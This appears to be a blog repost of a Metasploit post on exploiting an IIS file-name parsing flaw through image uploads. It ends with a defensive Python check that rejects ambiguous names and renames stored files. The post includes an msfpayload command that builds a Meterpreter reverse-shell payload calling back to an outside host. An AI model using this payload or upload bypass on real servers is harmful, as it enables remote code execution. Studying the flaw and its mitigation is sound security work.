Exploiting Microsoft IIS with Metasploit

As of this afternoon, the msfencode command has the ability to emit ASP scripts that execute Metasploit payloads. This can be used to exploit the currently-unpatched file name parsing bug feature in Microsoft IIS. This flaw allows a user who can upload a "safe" file extension (jpg, png, etc.) to upload an ASP script and force it to execute on the web server. The bug occurs when a file name is specified in the form of "evil.asp;.jpg" -- the application checks the file extension and sees "jpg", but the IIS server will stop parsing at the first ";" and sees "asp". The result is trivial code execution on any IIS server that allows users to choose the file name of their uploaded attachment.

For the following example, assume we have a web application that allows users to upload image files to the server. To complicate things, let's also assume that the application checks the file content to ensure that the uploaded file is a valid image. To exploit this, we need to generate an ASP script that drops a Meterpreter payload and configure a msfconsole instance to handle the session.

First we generate an ASP script that does a Meterpreter connect-back to the system running Metasploit:

    $ msfpayload windows/meterpreter/reverse_tcp \
        LHOST=1.2.3.4 LPORT=8443 R | \
        msfencode

(continue reading...)

Source: Metasploit
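
The parsing mismatch described above can be checked for on the upload side. The following is an added example, not code from the original Metasploit post: it models the two interpretations of a file name (the application's last-extension check and the stop-at-first-";" behaviour the post attributes to IIS) and stores uploads under a server-generated name. The function names, the allow-list and the sample file names are assumptions made for illustration.

```python
import os
import secrets

# Assumed allow-list for an image upload feature (not from the original post).
ALLOWED_EXTENSIONS = {".jpg", ".jpeg", ".png", ".gif"}


def naive_extension(filename):
    """Extension as the upload application sees it: text after the last dot."""
    return os.path.splitext(filename)[1].lower()


def extension_after_semicolon_cut(filename):
    """Extension as the post says IIS sees it: parsing stops at the first ';'."""
    return os.path.splitext(filename.split(";", 1)[0])[1].lower()


def is_ambiguous(filename):
    """True when the two interpretations of the name disagree."""
    return naive_extension(filename) != extension_after_semicolon_cut(filename)


def safe_stored_name(client_filename):
    """Return a server-generated name, or None if the upload must be rejected.

    The client-chosen base name is never used on disk; only an
    allow-listed extension survives.
    """
    # Drop any directory part, whichever separator the client used.
    base = os.path.basename(client_filename.replace("\\", "/"))
    if ";" in base or is_ambiguous(base):
        return None
    ext = naive_extension(base)
    if ext not in ALLOWED_EXTENSIONS:
        return None
    return secrets.token_hex(16) + ext


if __name__ == "__main__":
    # Constructed sample names; "evil.asp;.jpg" is the form quoted in the post.
    for name in ["holiday.jpg", "evil.asp;.jpg", "report.asp", "a.PNG"]:
        print(f"{name!r:18} -> {safe_stored_name(name)}")
```

Because the stored name is random and carries only an allow-listed extension, the user no longer chooses the file name, which is the condition the post identifies for exploitation.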

Copyright © 2012 The Security Blog. All rights reserved.